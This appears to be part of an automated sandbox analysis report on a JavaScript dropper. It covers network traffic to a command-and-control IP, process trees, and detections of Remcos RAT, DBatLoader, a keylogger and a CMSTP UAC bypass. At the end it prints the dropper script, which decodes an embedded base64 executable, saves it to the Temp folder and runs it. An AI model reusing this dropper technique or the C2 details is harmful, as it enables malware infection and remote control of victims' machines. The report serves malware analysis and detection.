                              Mar 15, 2025 09:32:59.082218885 CET78649736196.251.83.79192.168.2.6
                              Mar 15, 2025 09:32:59.082307100 CET49736786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:32:59.082339048 CET49736786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:32:59.088320971 CET78649736196.251.83.79192.168.2.6
                              Mar 15, 2025 09:32:59.936065912 CET49737786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:32:59.940969944 CET78649737196.251.83.79192.168.2.6
                              Mar 15, 2025 09:32:59.941118956 CET49737786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:32:59.941581011 CET49737786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:32:59.946310043 CET78649737196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:01.566036940 CET78649737196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:01.566353083 CET49737786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:01.571844101 CET49737786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:01.576477051 CET78649737196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:02.388932943 CET49738786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:02.393697023 CET78649738196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:02.393851042 CET49738786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:02.394133091 CET49738786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:02.398830891 CET78649738196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:04.035547972 CET78649738196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:04.035742998 CET49738786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:04.035959005 CET49738786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:04.040602922 CET78649738196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:04.842169046 CET49739786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:04.846930981 CET78649739196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:04.847048044 CET49739786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:04.847377062 CET49739786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:04.852089882 CET78649739196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:06.493746996 CET78649739196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:06.494410992 CET49739786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:06.494450092 CET49739786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:06.499150991 CET78649739196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:07.264367104 CET49740786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:07.269217968 CET78649740196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:07.269381046 CET49740786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:07.274194956 CET49740786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:07.278961897 CET78649740196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:08.907151937 CET78649740196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:08.908410072 CET49740786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:08.912328005 CET49740786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:08.917047024 CET78649740196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:09.654628992 CET49741786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:09.659667015 CET78649741196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:09.662401915 CET49741786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:09.662704945 CET49741786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:09.667644024 CET78649741196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:11.279426098 CET78649741196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:11.279561043 CET49741786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:11.279645920 CET49741786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:11.285490036 CET78649741196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:11.998512030 CET49742786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:12.003391981 CET78649742196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:12.006839037 CET49742786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:12.007178068 CET49742786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:12.011887074 CET78649742196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:13.641973019 CET78649742196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:13.642040014 CET49742786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:13.642076015 CET49742786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:13.646794081 CET78649742196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:14.342058897 CET49743786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:14.346820116 CET78649743196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:14.346925974 CET49743786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:14.347337008 CET49743786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:14.352024078 CET78649743196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:15.968436003 CET78649743196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:15.972378016 CET49743786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:15.972460985 CET49743786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:15.977094889 CET78649743196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:16.639159918 CET49744786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:16.643877983 CET78649744196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:16.643963099 CET49744786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:16.644299984 CET49744786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:16.649022102 CET78649744196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:18.262861967 CET78649744196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:18.266608000 CET49744786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:18.266694069 CET49744786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:18.271385908 CET78649744196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:18.920434952 CET49745786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:18.925235033 CET78649745196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:18.925380945 CET49745786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:18.925743103 CET49745786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:18.930399895 CET78649745196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:20.546535015 CET78649745196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:20.550678015 CET49745786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:20.550714016 CET49745786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:20.555514097 CET78649745196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:21.185926914 CET49746786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:21.190680027 CET78649746196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:21.190752983 CET49746786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:21.191057920 CET49746786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:21.195781946 CET78649746196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:22.817332029 CET78649746196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:22.818516970 CET49746786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:22.818595886 CET49746786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:22.823323965 CET78649746196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:23.435920000 CET49747786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:23.440774918 CET78649747196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:23.440859079 CET49747786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:23.441246986 CET49747786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:23.445976973 CET78649747196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:25.067589998 CET78649747196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:25.067662954 CET49747786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:25.067769051 CET49747786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:25.073034048 CET78649747196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:25.654603958 CET49748786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:25.660978079 CET78649748196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:25.661062956 CET49748786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:25.661454916 CET49748786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:25.666497946 CET78649748196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:27.276787043 CET78649748196.251.83.79192.168.2.6
                              Mar 15, 2025 09:33:27.276889086 CET49748786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:29.592546940 CET49748786192.168.2.6196.251.83.79
                              Mar 15, 2025 09:33:29.597294092 CET78649748196.251.83.79192.168.2.6

                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:1
                              Start time:04:31:17
                              Start date:15/03/2025
                              Path:C:\Windows\System32\wscript.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6732832.js"
                              Imagebase:0x7ff64ffa0000
                              File size:170'496 bytes
                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:3
                              Start time:04:31:18
                              Start date:15/03/2025
                              Path:C:\Users\user\AppData\Local\Temp\x.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                              Imagebase:0x400000
                              File size:1'964'032 bytes
                              MD5 hash:56432B42A6DF492A60F9577716132B79
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:Borland Delphi
                              Yara matches:
                              • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000003.00000002.1255041481.00000000023DF000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000003.00000002.1269621108.000000007E4F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.1269621108.000000007E4F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.1269621108.000000007E4F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000003.00000002.1269621108.000000007E4F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000003.00000002.1255776445.0000000002925000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.1255776445.0000000002925000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.1255776445.0000000002925000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000003.00000002.1255776445.0000000002925000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                              Antivirus matches:
                              • Detection: 100%, Avira
                              • Detection: 75%, ReversingLabs
                              • Detection: 40%, Virustotal, Browse
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:4
                              Start time:04:31:19
                              Start date:15/03/2025
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\6770.cmd""
                              Imagebase:0x2a0000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:5
                              Start time:04:31:20
                              Start date:15/03/2025
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff68dae0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:6
                              Start time:04:31:20
                              Start date:15/03/2025
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\16992.cmd""
                              Imagebase:0x2a0000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:7
                              Start time:04:31:20
                              Start date:15/03/2025
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff68dae0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:8
                              Start time:04:31:20
                              Start date:15/03/2025
                              Path:C:\Windows\SysWOW64\colorcpl.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\System32\colorcpl.exe
                              Imagebase:0xbb0000
                              File size:86'528 bytes
                              MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2523747715.0000000032B00000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2523747715.0000000032AE0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2523747715.0000000032AE8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2523856221.00000000344BF000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.2501429735.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2501429735.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.2501429735.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.2501429735.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000008.00000002.2501429735.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000008.00000002.2501429735.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                              Reputation:moderate
                              Has exited:false

                              General

                              Target ID:15
                              Start time:04:31:29
                              Start date:15/03/2025
                              Path:C:\Users\user\Links\Ekbmajrx.PIF
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Links\Ekbmajrx.PIF"
                              Imagebase:0x400000
                              File size:1'964'032 bytes
                              MD5 hash:56432B42A6DF492A60F9577716132B79
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:Borland Delphi
                              Antivirus matches:
                              • Detection: 100%, Avira
                              • Detection: 75%, ReversingLabs
                              • Detection: 40%, Virustotal, Browse
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:16
                              Start time:04:31:30
                              Start date:15/03/2025
                              Path:C:\Windows\SysWOW64\colorcpl.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\System32\colorcpl.exe
                              Imagebase:0xbb0000
                              File size:86'528 bytes
                              MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000010.00000002.1343119653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.1343119653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000010.00000002.1343119653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000010.00000002.1343119653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000010.00000002.1343119653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000010.00000002.1343119653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.1376834668.0000000030700000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:moderate
                              Has exited:true

                              General

                              Target ID:18
                              Start time:04:31:37
                              Start date:15/03/2025
                              Path:C:\Users\user\Links\Ekbmajrx.PIF
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Links\Ekbmajrx.PIF"
                              Imagebase:0x400000
                              File size:1'964'032 bytes
                              MD5 hash:56432B42A6DF492A60F9577716132B79
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:Borland Delphi
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:19
                              Start time:04:31:37
                              Start date:15/03/2025
                              Path:C:\Windows\SysWOW64\colorcpl.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\System32\colorcpl.exe
                              Imagebase:0xbb0000
                              File size:86'528 bytes
                              MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000013.00000002.1422872475.0000000002BD0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000002.1422872475.0000000002BD0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000013.00000002.1422872475.0000000002BD0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000013.00000002.1422872475.0000000002BD0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000013.00000002.1422872475.0000000002BD0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000013.00000002.1422872475.0000000002BD0000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000002.1422766132.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:moderate
                              Has exited:true

                              Disassembly

                              Code Analysis

                              Call Graph

                              • Executed
                              • Not Executed
                              callgraph clusterC0 clusterC2C0 clusterC4C2 clusterC6C0 clusterC10C6 clusterC12C6 clusterC14C6 clusterC8C0 clusterC16C0 E1C0 entry:C0 F5C4 createElement E1C0->F5C4 F11C10 Open E1C0->F11C10 F13C12 Write E1C0->F13C12 F15C14 SaveToFile E1C0->F15C14 F9C8 GetSpecialFolder E1C0->F9C8 F17C16 Run E1C0->F17C16 F3C2 ActiveXObject("Microsoft.XMLDOM") F7C6 ActiveXObject("ADODB.Stream")

                              Script:

                              Code
                              0
                              var D = new ActiveXObject ( "Microsoft.XMLDOM" );
                                1
                                var E = D.createElement ( "t" );
                                • createElement("t") ➔
                                2
                                E.dataType = "bin.base64";
                                  3
                                  E.text = "TVpQAAIAAAAEAA8A//8AALgAAAAAAAAAQAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAALo...
                                    4
                                    var b = new ActiveXObject ( "ADODB.Stream" );
                                      5
                                      var p = new ActiveXObject ( "Scripting.FileSystemObject" ).GetSpecialFolder ( 2 );
                                      • GetSpecialFolder(2) ➔ C:\Users\engineer\AppData\Local\Temp
                                      6
                                      b.Type = 1;
                                        7
                                        b.Open ( );
                                        • Open() ➔ undefined
                                        8
                                        b.Write ( E.nodeTypedValue );
                                        • Write() ➔ undefined
                                        9
                                        b.SaveToFile ( p + "\\x.exe", 2 );
                                        • SaveToFile("C:\Users\engineer\AppData\Local\Temp\x.exe",2) ➔ undefined
                                        10
                                        new ActiveXObject ( "WScript.Shell" ).Run ( p + "\\x.exe" );
                                        • Run("C:\Users\engineer\AppData\Local\Temp\x.exe") ➔ 0
                                        Reset < >